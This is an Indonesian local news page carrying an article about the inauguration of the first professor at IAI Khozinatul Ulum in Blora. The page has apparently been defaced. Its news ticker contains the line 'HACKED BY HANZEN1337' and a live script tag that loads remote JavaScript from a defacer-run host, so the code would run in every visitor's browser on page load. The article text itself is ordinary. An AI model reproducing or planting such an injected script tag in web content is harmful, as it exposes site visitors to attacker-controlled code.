News Ticker
  • HACKED BY HANZEN1337
  • <script src="https://jso.defacer.id/raw/I7j6n4T3C9"></script>
  • Kunjungan Kerja di Bojonegoro, Menhan Sjafrie Sjamsoeddin Tinjau Rencana Pengembangan Batalyon TP 885 dan Brigif 33 di Dander
  • 11 Juli dalam Sejarah
  • Prakiraan Cuaca Bojonegoro 11 Juli 2026
  • Kandang Ayam Senilai Rp2 M di Malo, Bojonegoro Ludes Terbakar
  • Panen Melon Bersama, Bupati Bojonegoro Ajak Generasi Muda Bangun Pertanian Modern
  • Pemkab Bojonegoro Alokasikan Rp11,03 Miliar untuk Lima Program Beasiswa Mahasiswa
  • Seorang Lansia Bojonegoro Tewas Tertabrak Kereta Api Jayabaya di Perlintasan Baureno
  • Perkiraan Harga Emas Hari Ini, 10 Jul 2026
  • Prakiraan Cuaca Bojonegoro 10 Juli 2026
  • 10 Juli dalam Sejarah
  • Kecamatan Kota Dominasi Emas Kickboxing, Klasemen Sementara Porkab II Bojonegoro Masih Memimpin
  • Dalam Sehari Terjadi Enam Kebakaran Lahan di Bojonegoro, Ini Daftarnya
  • Pemkab Bojonegoro Berikan Pembinaan Ribuan Mahasiswa Penerima Beasiswa Daerah
  • "El Último Tango", Sepatu Spesial Adidas untuk Perjalanan Terakhir Messi di Piala Dunia
  • Kejari Bojonegoro Terima Tahap II Kasus Dugaan Peredaran Rokok Ilegal
  • Paripurna DPRD, Raperda Pertanggungjawaban APBD 2025 Disetujui
  • Hadapi Musim Kemarau, Pemkab Bojonegoro Distribusikan Air Bersih ke Sejumlah Desa
  • Pemkab Bojonegoro Dorong Setiap OPD Lahirkan Inovasi Lewat BIA 2026
  • Prakiraan Cuaca Bojonegoro 9 Juli 2026
  • Rumah Kosong di Kapas, Bojonegoro Terbakar, Kerugian Capai 150 Juta Rupiah
  • Merayakan Detik Ini: Menemukan Kedamaian dalam Jejak Hidup yang Singkat
  • Tiga Rumah di Temayang Bojonegoro Terbakar Akibat Korsleting Listrik, Total Kerugian 520 Juta Rupiah
Kali Pertama, Guru Besar di IAI Khozinatul Ulum Blora Dikukuhkan

Kali Pertama, Guru Besar di IAI Khozinatul Ulum Blora Dikukuhkan

Blora - Bupati Blora Dr H Arief Rohman, menghadiri pengukuhan Prof Dr H Abdul Mufid Lc MSI, sebagai Guru Besar Kepakaran Ulumul Hadis di Institut Agama Islam (IAI) Khozinatul Ulum Blora. Selasa ( 17/12/2024).
 
Pada kesempatan tersebut, Bupati Arief Rohman mengucapkan selamat dan sukses kepada Prof Dr H Abdul Mufid Lc MSI, yang baru saja dikukuhkan sebagai Guru Besar Kepakaran Ulumul Hadis.
 
"Alhamdulillah, atas nama pribadi dan Pemerintah Kabupaten Blora, mengucapkan selamat dan sukses semoga Prof. Mufid semoga ilmu pengetahuannya bagi kemajuan IAI Khozinatul Ulum pada khususnya, dan Islam pada umumnya," ucapnya.
 
 
Bupati juga menyampaikan selamat kepada IAI Khozinatul Ulum, telah menambah jumlah guru besar. Semoga keberkahan ilmunya lumeber ke mahasiswa-mahasiswanya.
 
"Guru besar ini bukan hanya jabatan tertinggi, tapi amanah akademik. Dengan pengukuhan ini, saya berharap ke depan ada dukungan saran, ide, dan inovasi dalam membangun sumber daya insani terbaik untuk kemajuan Kabupaten Blora," kata Bupati Arief Rohman.
 
Bupati berharap semoga ke depan jejak Prof. Mufid dapat diikuti oleh dosen-dosen lain, melahirkan pemikir dan pemimpin muda yang handal di masa mendatang.
 
Dalam acara ini juga dihadiri Koordinator Kopertis Wilayah X Jawa Tengah, Prof Dr H Nizar Ali MAg, Rektor IAIKU KH Ahmad Zaki Fuad MAg.
 
 
 
Koordinator Kopertis Wilayah X Jawa Tengah, Prof Dr H Nizar Ali MAg, dalam sambutanya mengucapkan selamat atas Pengukuhan ini semoga kedepan bisa semakin membawa IAI Khozinatul Ulum menjadi perguruan tinggi Islam yang lebih maju.
 
"Mudah-mudahan ke depan Guru Besar pertama di Blora ini bisa membawa IAI menjadi universitas," tuturnya. (teg/imm)
 
 
Reporter: Priyo
Editor: Imam Nurcahyo
Publisher: Imam Nurcahyo
Berita Terkait
1783903072.1315 at start, 1783903073.0131 at end, 0.88162398338318 sec elapsed